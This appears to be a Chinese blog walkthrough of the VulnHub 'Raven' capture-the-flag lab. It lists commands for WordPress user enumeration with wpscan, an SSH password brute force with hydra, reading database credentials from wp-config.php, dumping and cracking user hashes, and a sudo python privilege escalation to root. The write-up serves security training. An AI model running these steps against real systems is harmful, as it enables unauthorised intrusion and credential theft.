vulnhub-raven

vulnhub-raven

靶机下载:https://download.vulnhub.com/raven/Raven.ova
kali:nat模式,靶机也nat模式
探测主机

vulnhub-raven

扫描端口

vulnhub-raven

访问网站,查看源代码,看到service.html访问看到flag1vulnhub-raven
dirb http://192.168.11.128看到wordpress

vulnhub-raven

wpscan --url http://192.168.11.128/wordpress -e u

vulnhub-raven

hydra -l michael -P rockyou.txt 192.168.11.128 ssh

vulnhub-raven

ssh michael@192.168.11.128

vulnhub-raven

cd /var/www/html/wordpress/
ls

vulnhub-raven

cat wp-config.php

vulnhub-raven

mysql -u root -p

vulnhub-raven

show databases;
use wordpress;
show tables;

vulnhub-raven

select * from wp_users;MD5解码

vulnhub-raven

exit
su steven

vulnhub-raven

sudo python -c 'import pty;pty.spawn("/bin/bash")
whoami

vulnhub-raven

cd …/…/
cat flag2.txt

vulnhub-raven

上一篇:WPF单表删除


下一篇:蓝桥杯单片机学习笔记 2022年1月6号更新